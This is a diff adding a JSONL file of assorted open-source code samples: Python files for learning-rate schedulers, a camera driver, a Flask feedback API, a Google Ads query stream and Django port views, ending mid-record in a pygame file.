diff --git "a/4559.jsonl" "b/4559.jsonl" new file mode 100644--- /dev/null +++ "b/4559.jsonl" @@ -0,0 +1,699 @@ +{"seq_id":"641182985","text":"# Given an array of integers and an integer k,\n# find out whether there are two distinct indices i and j in the array such that nums[i] = nums[j] and\n# the absolute difference between i and j is at most k.\n\nclass Solution(object):\n def containsNearbyDuplicate(self, nums, k):\n dic = {}\n for index, value in enumerate(nums):\n if value in dic and abs(index-dic[value]) <= k:\n return True\n else:\n dic[value] = index\n return False","sub_path":"219_contain_duplicate_2.py","file_name":"219_contain_duplicate_2.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73581238","text":"# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport math\n\nfrom .. import unique_name\n\n__all__ = [\n 'NoamDecay', 'PiecewiseDecay', 'NaturalExpDecay', 'ExponentialDecay',\n 'InverseTimeDecay', 'PolynomialDecay', 'CosineDecay'\n]\n\n\nclass LearningRateDecay(object):\n \"\"\"\n Base class of learning rate decay\n \"\"\"\n\n def __init__(self, begin=0, step=1, dtype='float32'):\n self.step_num = begin\n self.step_size = step\n self.dtype = dtype\n\n def __call__(self):\n lr = self.step()\n if isinstance(lr, float):\n lr = self.create_lr_var(lr)\n self.step_num += self.step_size\n return lr\n\n def create_lr_var(self, lr):\n from .. import layers\n lr = layers.create_global_var(\n name=unique_name.generate(\"learning_rate\"),\n shape=[1],\n value=float(lr),\n dtype=self.dtype,\n persistable=True)\n return lr\n\n def step(self):\n raise NotImplementedError()\n\n\nclass PiecewiseDecay(LearningRateDecay):\n def __init__(self, boundaries, values, begin, step=1, dtype='float32'):\n super(PiecewiseDecay, self).__init__(begin, step, dtype)\n self.boundaries = boundaries\n self.values = values\n\n self.vars = []\n for value in values:\n self.vars.append(self.create_lr_var(value))\n\n def step(self):\n for i in range(len(self.boundaries)):\n if self.step_num < self.boundaries[i]:\n return self.vars[i]\n return self.vars[len(self.values) - 1]\n\n\nclass NaturalExpDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n decay_rate,\n staircase=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(NaturalExpDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n self.staircase = staircase\n\n def step(self):\n from .. import layers\n div_res = self.create_lr_var(self.step_num / self.decay_steps)\n if self.staircase:\n div_res = layers.floor(div_res)\n decayed_lr = self.learning_rate * layers.exp(-1 * self.decay_rate *\n div_res)\n\n return decayed_lr\n\n\nclass ExponentialDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n decay_rate,\n staircase=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(ExponentialDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n self.staircase = staircase\n\n def step(self):\n from .. import layers\n div_res = self.create_lr_var(self.step_num / self.decay_steps)\n if self.staircase:\n div_res = layers.floor(div_res)\n\n decayed_lr = self.learning_rate * (self.decay_rate**div_res)\n\n return decayed_lr\n\n\nclass InverseTimeDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n decay_rate,\n staircase=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(InverseTimeDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n self.staircase = staircase\n\n def step(self):\n from .. import layers\n div_res = self.create_lr_var(self.step_num / self.decay_steps)\n if self.staircase:\n div_res = layers.floor(div_res)\n\n decayed_lr = self.learning_rate / (1 + self.decay_rate * div_res)\n\n return decayed_lr\n\n\nclass PolynomialDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n decay_steps,\n end_learning_rate=0.0001,\n power=1.0,\n cycle=False,\n begin=0,\n step=1,\n dtype='float32'):\n super(PolynomialDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.end_learning_rate = end_learning_rate\n self.power = power\n self.cycle = cycle\n\n def step(self):\n from .. import layers\n tmp_step_num = self.step_num\n tmp_decay_steps = self.decay_steps\n if self.cycle:\n div_res = layers.ceil(\n self.create_lr_var(tmp_step_num / float(self.decay_steps)))\n\n if tmp_step_num == 0:\n div_res = self.create_lr_var(1.0)\n tmp_decay_steps = self.decay_steps * div_res\n else:\n tmp_step_num = self.create_lr_var(tmp_step_num\n if tmp_step_num < self.decay_steps\n else self.decay_steps)\n\n decayed_lr = (self.learning_rate - self.end_learning_rate) * \\\n ((1 - tmp_step_num / tmp_decay_steps) ** self.power) + self.end_learning_rate\n return decayed_lr\n\n\nclass CosineDecay(LearningRateDecay):\n def __init__(self,\n learning_rate,\n step_each_epoch,\n epochs,\n begin=0,\n step=1,\n dtype='float32'):\n super(CosineDecay, self).__init__(begin, step, dtype)\n self.learning_rate = learning_rate\n self.step_each_epoch = step_each_epoch\n self.epochs = epochs\n\n def step(self):\n from .. import layers\n cur_epoch = layers.floor(\n self.create_lr_var(self.step_num / self.step_each_epoch))\n decayed_lr = self.learning_rate * 0.5 * (\n layers.cos(cur_epoch * math.pi / self.epochs) + 1)\n return decayed_lr\n\n\nclass NoamDecay(LearningRateDecay):\n def __init__(self, d_model, warmup_steps, begin=1, step=1, dtype='float32'):\n super(NoamDecay, self).__init__(begin, step, dtype)\n self.d_model = d_model\n self.warmup_steps = warmup_steps\n\n def step(self):\n from .. import layers\n a = self.create_lr_var(self.step_num**-0.5)\n b = self.create_lr_var((self.warmup_steps**-1.5) * self.step_num)\n lr_value = (self.d_model**-0.5) * layers.elementwise_min(a, b)\n return lr_value\n","sub_path":"python/paddle/fluid/dygraph/learning_rate_scheduler.py","file_name":"learning_rate_scheduler.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471273249","text":"#!/usr/bin/env python\n#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nimport os.path as path\nfrom bes.testing.unit_test import unit_test\nfrom bes.build.build_system import build_system\nfrom bes.build.build_target import build_target\nfrom rebuild.toolchain.compiler import compiler\nfrom rebuild.toolchain.toolchain import toolchain\nfrom rebuild.toolchain.toolchain_testing import toolchain_testing\nfrom bes.system.host import host\nfrom bes.fs.file_util import file_util\nfrom bes.fs.temp_file import temp_file\nfrom bes.common.object_util import object_util\nfrom bes.common.variable import variable\nfrom bes.testing.unit_test_function_skip import unit_test_function_skip\n\nclass test_toolchain(unit_test):\n\n DEBUG = False\n #DEBUG = True\n\n CC_SOURCE = r'''\n#include \nint main(int argc, char* argv[])\n{\n printf(\"%s::main()\\n\", __FILE__);\n return 0;\n}\n'''\n\n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_macos(), 'cannot compile macos')\n def test_compile_cc_macos(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.MACOS, 'x86_64')\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n\n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_ios(), 'cannot compile ios')\n def test_compile_cc_ios(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.IOS, 'arm64')\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n\n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_android(), 'cannot compile android')\n def test_compile_cc_android(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.ANDROID, 'armv7')\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n \n @unit_test_function_skip.skip_if(not toolchain_testing.can_compile_linux(), 'cannot compile linux')\n def test_compile_cc_linux(self):\n tmp_dir = self._make_temp_dir()\n src = self._make_temp_source(tmp_dir, 'test.c', self.CC_SOURCE)\n cc = self._make_compiler(build_system.LINUX, host.ARCH)\n targets = cc.compile_c(src)\n self.assertEqual( 1, len(targets) )\n self.assertTrue( path.exists(targets[0][1]) )\n \n @classmethod\n def _make_temp_dir(clazz):\n tmp_dir = temp_file.make_temp_dir(delete = not clazz.DEBUG)\n if clazz.DEBUG:\n print('tmp_dir: %s' % (tmp_dir))\n return tmp_dir\n\n @classmethod\n def _make_temp_source(clazz, tmp_dir, filename, content):\n return file_util.save(path.join(tmp_dir, filename), content = content)\n\n @classmethod\n def _make_compiler(clazz, system, arch):\n return compiler(build_target(system, '', '', '', arch, 'release'))\n\nif __name__ == '__main__':\n unit_test.main()\n","sub_path":"tests/lib/rebuild/toolchain/test_toolchain.py","file_name":"test_toolchain.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"42021578","text":"import sys\nimport os\nimport time\nfrom PyQt5.QtCore import QUrl, QTimer\nfrom PyQt5.QtMultimedia import QMediaPlaylist, QMediaPlayer, QMediaContent\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog\nfrom ui_player import Ui_Form\n\n\nclass MyMainForm(QMainWindow, Ui_Form):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.initialize()\n\n def initialize(self):\n self.setWindowTitle(\"Love\")\n self.fileName = \"\"\n self.cur_song = ''\n self.is_pause = True\n self.playlist = QMediaPlaylist() # 播放列表\n self.playlist.setPlaybackMode(QMediaPlaylist.Loop) # 列表循环\n self.player = QMediaPlayer(self)\n self.player.setPlaylist(self.playlist)\n\n # 按键\n self.btn_openfile.clicked.connect(lambda: self.btn_openfile_click())\n self.btn_play.clicked.connect(lambda: self.btn_play_click())\n\n # 进度条\n self.slider_time.sliderMoved[int].connect(lambda: self.player.setPosition(self.slider_time.value()))\n\n # 计时器:控制进度条和进度时间\n self.timer = QTimer(self)\n self.timer.start(1000)\n self.timer.timeout.connect(self.player_timer)\n\n def btn_play_click(self):\n if self.is_pause:\n self.is_pause = False\n self.player.play()\n self.btn_play.setText('stop')\n # for debug\n # print('当前播放歌曲: ' + self.cur_song)\n else:\n self.is_pause = True\n self.player.pause()\n self.btn_play.setText('play')\n\n def btn_openfile_click(self):\n self.playlist.clear() # 读取歌曲前,清空playlist\n self.fileName, filetype = QFileDialog.getOpenFileName(self, '选择文件', '', '音频文件 (*.wav)')\n # for debug\n # print('当前歌曲路径:' + self.fileName)\n self.cur_song = os.path.basename(self.fileName)\n self.lab_openfile.setText(self.cur_song)\n # 将音频文件添加到playlist\n self.playlist.addMedia(QMediaContent(QUrl.fromLocalFile(self.fileName)))\n\n # 正在播放音乐时,中断播放\n if self.is_pause is False:\n self.player.pause()\n self.btn_play.setText('play')\n\n # 设置进度条和播放时间\n def player_timer(self):\n self.slider_time.setMinimum(0)\n self.slider_time.setMaximum(self.player.duration())\n self.slider_time.setValue(self.slider_time.value() + 1000)\n\n self.lab_time.setText(time.strftime('%M:%S', time.localtime(self.player.position() / 1000)))\n self.lab_duration.setText(time.strftime('%M:%S', time.localtime(self.player.duration() / 1000)))\n\n # 进度条满了之后回零\n if self.player.duration() == self.slider_time.value():\n self.slider_time.setValue(0)\n\n\nif __name__ == \"__main__\":\n # 固定的,PyQt5程序都需要QApplication对象。sys.argv是命令行参数列表,确保程序可以双击运行\n app = QApplication(sys.argv)\n # 初始化\n myWin = MyMainForm()\n # 将窗口控件显示在屏幕上\n myWin.show()\n # 程序运行,sys.exit方法确保程序完整退出。\n sys.exit(app.exec_())\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343743146","text":"############################################################\n# -*- coding: utf-8 -*-\n#\n# # # # # # #\n# ## ## # ## # #\n# # # # # # # # # # #\n# # ## # ## ## ######\n# # # # # # #\n#\n# Python-based Tool for interaction with the 10micron mounts\n# GUI with PyQT5 for python\n# Python v3.7.5\n#\n# Michael Würtenberger\n# (c) 2019\n#\n# Licence APL2.0\n#\n###########################################################\n# standard libraries\nimport logging\nimport time\nfrom datetime import datetime\n# external packages\nimport PyQt5\nimport numpy as np\nfrom astropy.io import fits\n# local imports\nfrom mw4.base.loggerMW import CustomLogger\nfrom mw4.base.alpacaClass import AlpacaClass\nfrom mw4.base.alpacaBase import Camera\nfrom mw4.base.tpool import Worker\n\n\nclass CameraAlpaca(AlpacaClass):\n \"\"\"\n the class Dome inherits all information and handling of the Dome device. there will be\n some parameters who will define the slewing position of the dome relating to the\n mount.dome = DomeAlpaca(app=None)\n \"\"\"\n\n __all__ = ['CameraAlpaca',\n ]\n\n # specific timing for device\n CYCLE_DEVICE = 3000\n CYCLE_DATA = 1000\n\n def __init__(self, app=None, signals=None, data=None):\n super().__init__(app=app, data=data)\n\n # as we have in the base class only the base client there, we will get more\n # specialized with Dome (which is derived from the base class)\n self.client = Camera()\n self.signals = signals\n self.data = data\n self.imagePath = ''\n\n def getInitialConfig(self):\n \"\"\"\n\n :return: true for test purpose\n \"\"\"\n super().getInitialConfig()\n\n self.dataEntry(self.client.cameraxsize(), 'CCD_INFO.CCD_MAX_X')\n self.dataEntry(self.client.cameraysize(), 'CCD_INFO.CCD_MAX_Y')\n self.dataEntry(self.client.canfastreadout(), 'CAN_FAST')\n # self.dataEntry(self.client.canstopexposure(), 'CAN_ABORT')\n self.dataEntry(self.client.pixelsizex(), 'CCD_INFO.CCD_PIXEL_SIZE_X')\n self.dataEntry(self.client.pixelsizey(), 'CCD_INFO.CCD_PIXEL_SIZE_Y')\n self.dataEntry(self.client.maxbinx(), 'CCD_BINNING.HOR_BIN_MAX')\n self.dataEntry(self.client.maxbiny(), 'CCD_BINNING.VERT_BIN_MAX')\n self.dataEntry(self.client.binx(), 'CCD_BINNING.HOR_BIN')\n self.dataEntry(self.client.biny(), 'CCD_BINNING.VERT_BIN')\n self.dataEntry(self.client.startx(), 'CCD_FRAME.X')\n self.dataEntry(self.client.starty(), 'CCD_FRAME.Y')\n\n return True\n\n def workerPollData(self):\n \"\"\"\n\n :return: true for test purpose\n \"\"\"\n\n self.dataEntry(self.client.camerastate(),\n 'CAMERA.STATE')\n self.dataEntry(self.client.ccdtemperature(),\n 'CCD_TEMPERATURE.CCD_TEMPERATURE_VALUE')\n self.dataEntry(self.client.fastreadout(),\n 'READOUT_QUALITY.QUALITY_LOW',\n 'READOUT_QUALITY.QUALITY_HIGH')\n return True\n\n def pollData(self):\n \"\"\"\n\n :return: success\n \"\"\"\n\n if not self.deviceConnected:\n return False\n\n worker = Worker(self.workerPollData)\n self.threadPool.start(worker)\n return True\n\n def sendDownloadMode(self, fastReadout=False):\n \"\"\"\n setDownloadMode sets the readout speed of the camera\n\n :return: success\n \"\"\"\n\n suc = self.data['CAN_FAST']\n if suc and fastReadout:\n self.client.fastreadout(FastReadout=True)\n quality = 'High' if self.data.get('READOUT_QUALITY.QUALITY_HIGH', True) else 'Low'\n self.log.info(f'camera has readout quality entry: {quality}')\n\n return suc\n\n def workerExpose(self,\n imagePath='',\n expTime=3,\n binning=1,\n fastReadout=True,\n posX=0,\n posY=0,\n width=1,\n height=1,\n ):\n \"\"\"\n\n :param imagePath:\n :param expTime:\n :param binning:\n :param fastReadout:\n :param posX:\n :param posY:\n :param width:\n :param height:\n :return: success\n \"\"\"\n\n self.imagePath = imagePath\n binning = int(binning)\n posX = int(posX)\n posY = int(posY)\n width = int(width)\n height = int(height)\n\n suc = self.sendDownloadMode(fastReadout=fastReadout)\n if not suc:\n self.log.info('Camera has no download quality settings')\n\n # set binning\n self.client.binx(BinX=binning)\n self.client.biny(BinY=binning)\n\n # set frame sizes\n self.client.startx(StartX=posX)\n self.client.starty(StartY=posY)\n self.client.numx(NumX=width)\n self.client.numy(NumY=height)\n\n # start exposure\n self.client.startexposure(Duration=expTime, Light=True)\n\n # wait for finishing\n timeLeft = expTime\n while not self.client.imageready():\n text = f'expose {timeLeft:3.0f} s'\n time.sleep(1)\n if timeLeft >= 1:\n timeLeft -= 1\n else:\n timeLeft = 0\n self.signals.message.emit(text)\n self.signals.integrated.emit()\n\n # download image\n self.signals.message.emit('download')\n data = np.array(self.client.imagearray(), dtype=np.uint16)\n data = np.transpose(data)\n\n # creating a fits file and saving the image\n self.signals.message.emit('saving')\n hdu = fits.PrimaryHDU(data=data)\n header = hdu.header\n header['OBJECT'] = 'skymodel'\n header['FRAME'] = 'Light'\n header['EQUINOX'] = 2000\n header['PIXSIZE1'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_X']\n header['PIXSIZE2'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_Y']\n header['XPIXSZ'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_X']\n header['YPIXSZ'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_Y']\n header['SCALE'] = self.data['CCD_INFO.CCD_PIXEL_SIZE_X'] / 570 * 206.265\n header['XBINNING'] = binning\n header['YBINNING'] = binning\n header['EXPTIME'] = expTime\n header['OBSERVER'] = 'MW4'\n header['DATE-OBS'] = self.app.mount.obsSite.timeJD.utc_iso()\n\n if self.app.mainW.deviceStat['mount']:\n header['OBJCTRA'] = self.app.mount.obsSite.raJNow.hstr()\n dec = self.app.mount.obsSite.decJNow.dstr()\n dec = dec.replace('deg', '').replace(\"'\", '').replace('\"', '')\n header['OBJCTDEC'] = dec\n header['RA'] = self.app.mount.obsSite.raJNow.hours\n header['DEC'] = self.app.mount.obsSite.decJNow.degrees\n header['TELESCOP'] = self.app.mount.firmware.product\n\n hdu.writeto(self.imagePath, overwrite=True)\n\n self.signals.message.emit('')\n self.signals.saved.emit(self.imagePath)\n\n return suc\n\n def expose(self,\n imagePath='',\n expTime=3,\n binning=1,\n fastReadout=True,\n posX=0,\n posY=0,\n width=1,\n height=1,\n ):\n \"\"\"\n\n :return: success\n \"\"\"\n\n if not self.deviceConnected:\n return False\n\n worker = Worker(self.workerExpose,\n imagePath=imagePath,\n expTime=expTime,\n binning=binning,\n fastReadout=fastReadout,\n posX=posX,\n posY=posY,\n width=width,\n height=height)\n # worker.signals.result.connect(self.emitStatus)\n self.threadPool.start(worker)\n return True\n\n def abort(self):\n \"\"\"\n abort cancels the exposing\n\n :return: success\n \"\"\"\n\n if not self.deviceConnected:\n return False\n\n canAbort = self.data.get('CAN_ABORT', False)\n if canAbort:\n self.client.stopexposure()\n\n return True\n","sub_path":"mw4/imaging/cameraAlpaca.py","file_name":"cameraAlpaca.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"10220378","text":"#coding: utf-8\n\nfrom . import api\nfrom .decorators import admin_required, tojson\nfrom flask import request, jsonify\nfrom restccnu.models import connection, Feedback\n# from restccnu.workers.workers import send_async_mail\n\nADMIN_EMAIL = \"muxistudio@qq.com\"\nMAIL_DEFAULT_SENDER = \"muxistudio@163.com\"\nMAIL_SUBJECT_PREFIX = \"[feedback]\"\n\n# def send_mail(to, subject, template, **kwargs):\n# \"\"\"\n# kwargs: {'feedback', 'contact'}\n# \"\"\"\n# msg = Message(\n# MAIL_SUBJECT_PREFIX+ subject,\n# sender = MAIL_DEFAULT_SENDER,\n# recipients = [to]\n# )\n# msg.html = render_template(template, **kwargs)\n# send_async_email.delay(msg) # delay\n\n\n@api.route('/feedback/', methods=['GET', 'POST'])\ndef ios_post_feedback():\n if request.method == 'POST':\n feedobj = connection.Feedback()\n feedback = request.get_json().get('feedback')\n contact = request.get_json().get('contact')\n # 发邮件服务 => 直接发管理后台\n # send_mail( # a celery async task\n # ADMIN_EMAIL, 'ccnubox~ios: there is a new feedback',\n # 'mail.html',\n # feedback=feedback, contact=contact\n # )\n feedobj['contact'] = contact # 存储用户反馈: 联系方式+反馈信息\n feedobj['feedback'] = feedback\n feedobj.save()\n return jsonify({}), 201\n\n\n@api.route('/feedbacks/', methods=['GET'])\n@admin_required\n@tojson\ndef ios_get_feedback():\n feedbacks_list = []\n feedbacks = connection.Feedback.find()\n for feedback in feedbacks:\n feedbacks_list.append({\n feedback['contact']:feedback['feedback']\n })\n return feedbacks_list\n ","sub_path":"restccnu/apis/ios_feedback.py","file_name":"ios_feedback.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545958271","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if len(nums) == 0:\n return [[]]\n lis = [[n_i] for n_i in nums]\n temp = lis\n res = temp\n for i in xrange(1,len(nums)):\n temp = [temp_i+lis_i for temp_i in temp for lis_i in lis if temp_i[-1] str:\n \"\"\"\n The primary_key option is disabled. Config should not provide the primary key.\n It will be ignored if provided.\n If you need to enable it, uncomment the next line instead of `return None` and modify your config\n \"\"\"\n # return self.custom_query_config.get(\"primary_key\") or None\n return None\n\n @property\n def name(self):\n return self.custom_query_config[\"table_name\"]\n\n def get_query(self, stream_slice: Mapping[str, Any] = None) -> str:\n start_date, end_date = self.get_date_params(stream_slice, self.cursor_field)\n return self.insert_segments_date_expr(self.user_defined_query, start_date, end_date)\n\n # IncrementalGoogleAdsStream uses get_json_schema a lot while parsing\n # responses, caching plaing crucial role for performance here.\n @lru_cache()\n def get_json_schema(self) -> Dict[str, Any]:\n \"\"\"\n Compose json schema based on user defined query.\n :return Dict object representing jsonschema\n \"\"\"\n\n local_json_schema = {\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"type\": \"object\",\n \"properties\": {},\n \"additionalProperties\": True,\n }\n # full list {'ENUM', 'STRING', 'DATE', 'DOUBLE', 'RESOURCE_NAME', 'INT32', 'INT64', 'BOOLEAN', 'MESSAGE'}\n\n google_datatype_mapping = {\n \"INT64\": \"integer\",\n \"INT32\": \"integer\",\n \"DOUBLE\": \"number\",\n \"STRING\": \"string\",\n \"BOOLEAN\": \"boolean\",\n \"DATE\": \"string\",\n }\n fields = CustomQuery.get_query_fields(self.user_defined_query)\n fields.append(self.cursor_field)\n google_schema = self.google_ads_client.get_fields_metadata(fields)\n\n for field in fields:\n node = google_schema.get(field)\n # Data type return in enum format: \"GoogleAdsFieldDataType.\"\n google_data_type = str(node.data_type).replace(\"GoogleAdsFieldDataType.\", \"\")\n if google_data_type == \"ENUM\":\n field_value = {\"type\": \"string\", \"enum\": list(node.enum_values)}\n elif google_data_type == \"MESSAGE\":\n # Represents protobuf message and could be anything, set custom\n # attribute \"protobuf_message\" to convert it to a string (or\n # array of strings) later.\n # https://developers.google.com/google-ads/api/reference/rpc/v8/GoogleAdsFieldDataTypeEnum.GoogleAdsFieldDataType?hl=en#message\n if node.is_repeated:\n output_type = [\"array\", \"null\"]\n else:\n output_type = [\"string\", \"null\"]\n field_value = {\"type\": output_type, \"protobuf_message\": True}\n else:\n output_type = [google_datatype_mapping.get(google_data_type, \"string\"), \"null\"]\n field_value = {\"type\": output_type}\n if google_data_type == \"DATE\":\n field_value[\"format\"] = \"date\"\n\n local_json_schema[\"properties\"][field] = field_value\n\n return local_json_schema\n\n # Regexp flags for parsing GAQL query\n RE_FLAGS = re.DOTALL | re.MULTILINE | re.IGNORECASE\n # Regexp for getting query columns\n SELECT_EXPR = re.compile(\"select(.*)from\", flags=RE_FLAGS)\n WHERE_EXPR = re.compile(\"where.*\", flags=RE_FLAGS)\n # list of keywords that can come after WHERE clause,\n # according to https://developers.google.com/google-ads/api/docs/query/grammar\n KEYWORDS_EXPR = re.compile(\"(order by|limit|parameters)\", flags=RE_FLAGS)\n\n @staticmethod\n def get_query_fields(query: str) -> List[str]:\n fields = CustomQuery.SELECT_EXPR.search(query)\n if not fields:\n return []\n fields = fields.group(1)\n return [f.strip() for f in fields.split(\",\")]\n\n @staticmethod\n def insert_segments_date_expr(query: str, start_date: str, end_date: str) -> str:\n \"\"\"\n Insert segments.date condition to break query into slices for incremental stream.\n :param query Origin user defined query\n :param start_date start date for metric (inclusive)\n :param end_date end date for metric (inclusive)\n :return Modified query with date window condition included\n \"\"\"\n # insert segments.date field\n columns = CustomQuery.SELECT_EXPR.search(query)\n if not columns:\n raise Exception(\"Not valid GAQL expression\")\n columns = columns.group(1)\n new_columns = columns + \", segments.date\\n\"\n result_query = query.replace(columns, new_columns)\n\n # Modify/insert where condition\n where_cond = CustomQuery.WHERE_EXPR.search(result_query)\n if not where_cond:\n # There is no where condition, insert new one\n where_location = len(result_query)\n keywords = CustomQuery.KEYWORDS_EXPR.search(result_query)\n if keywords:\n # where condition is not at the end of expression, insert new condition before keyword begins.\n where_location = keywords.start()\n result_query = (\n result_query[0:where_location]\n + f\"\\nWHERE segments.date BETWEEN '{start_date}' AND '{end_date}'\\n\"\n + result_query[where_location:]\n )\n return result_query\n # There is already where condition, add segments.date expression\n where_cond = where_cond.group(0)\n keywords = CustomQuery.KEYWORDS_EXPR.search(where_cond)\n if keywords:\n # There is some keywords after WHERE condition\n where_cond = where_cond[0 : keywords.start()]\n new_where_cond = where_cond + f\" AND segments.date BETWEEN '{start_date}' AND '{end_date}'\\n\"\n result_query = result_query.replace(where_cond, new_where_cond)\n return result_query\n","sub_path":"airbyte-integrations/connectors/source-google-ads/source_google_ads/custom_query_stream.py","file_name":"custom_query_stream.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449873503","text":"from django.shortcuts import render\nfrom .models import Port, Category, BuildHistory\nimport json\nfrom django.http import HttpResponse\n\ndef index(request):\n alphabet = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n categories = Category.objects.all()\n return render(request, 'ports/index.html', {\n 'alphabet': alphabet,\n 'categories': categories\n })\n\n\ndef categorylist(request, cat):\n ports = Port.objects.filter(categories__name=cat).order_by('id')\n portscount = ports.count()\n return render(request, 'ports/categorylist.html',\n {\n 'ports': ports,\n 'portscount': portscount,\n 'category': cat\n })\n\n\ndef letterlist(request, letter):\n ports = Port.objects.all()\n sortedports = []\n for port in ports:\n firstletter = list(port.name)[0]\n if firstletter.casefold() == letter.casefold():\n sortedports.append(port)\n portscount = len(sortedports)\n\n return render(request, 'ports/letterlist.html',\n {\n 'ports': sortedports,\n 'letter': letter.upper(),\n 'portscount' : portscount\n })\n\n\ndef portdetail(request, name):\n port = Port.objects.get(name=name)\n build_history = BuildHistory.objects.filter(port_name=name).order_by('-time_start')\n build_hsierra = build_history.filter(builder_name=\"10.13_x86_64\")\n build_mojave = build_history.filter(builder_name=\"10.14_x86_64\")\n build_sierra = build_history.filter(builder_name=\"10.12_x86_64\")\n\n status = []\n if build_hsierra:\n status.append(build_hsierra[0])\n if build_mojave:\n status.append(build_mojave[0])\n if build_sierra:\n status.append(build_sierra[0])\n return render(request, 'ports/portdetail.html', {\n 'port': port,\n 'build_history': build_history,\n 'status' : status\n })\n\ndef stats(request):\n return render(request, 'ports/stats.html')\n\ndef stats_portdetail(request, name):\n port = Port.objects.get(name=name)\n return render(request, 'ports/stats_portdetail.html',{\n 'port':port,\n })\n\ndef search(request):\n if request.method == 'POST':\n search_text = request.POST['search_text']\n search_results = Port.objects.filter(name__icontains=search_text)[:10]\n has_input = True\n else:\n search_results = Port.objects.none()\n\n return render(request, 'ports/search.html', {\n 'search_results' : search_results,\n 'has_input': has_input\n })\n\n\n\n","sub_path":"ports/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7757377","text":"#python eval.py p1_valid.txt ../hw4_data/TrimmedVideos/label/gt_test_ans.csv\n#python eval.py p2_result.txt ../hw4_data/TrimmedVideos/label/gt_test_ans.csv\n#python eval.py p2_result.txt ../hw4_data/TrimmedVideos/label/gt_valid.csv\n\nfrom reader import getVideoList\nimport numpy as np\nimport sys\nimport os\n\ntest_predict_path = sys.argv[1]\ntest_label_path = sys.argv[2] #TrimmedVideos/label/gt_valid.csv\n\n# read files\ndict = getVideoList(os.path.join(test_label_path))\nf = open(os.path.join(test_predict_path),'r')\npredict_vals = f.read().splitlines()\n\n# evaluation ans\nprint(\"\\nevaluation ans...\")\npredict_vals = np.array(predict_vals).astype(int)\nprint(\"predict_vals:\\n\",predict_vals)\nlabel_vals = np.array(dict['Action_labels']).astype(int)\nprint(\"label_vals:\\n\",label_vals)\naccuracy = np.mean(predict_vals == label_vals)\nprint(\"accuracy:\",accuracy)\n","sub_path":"hw4_rnn_action_recognition/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"482914766","text":"import pygame, os, random, 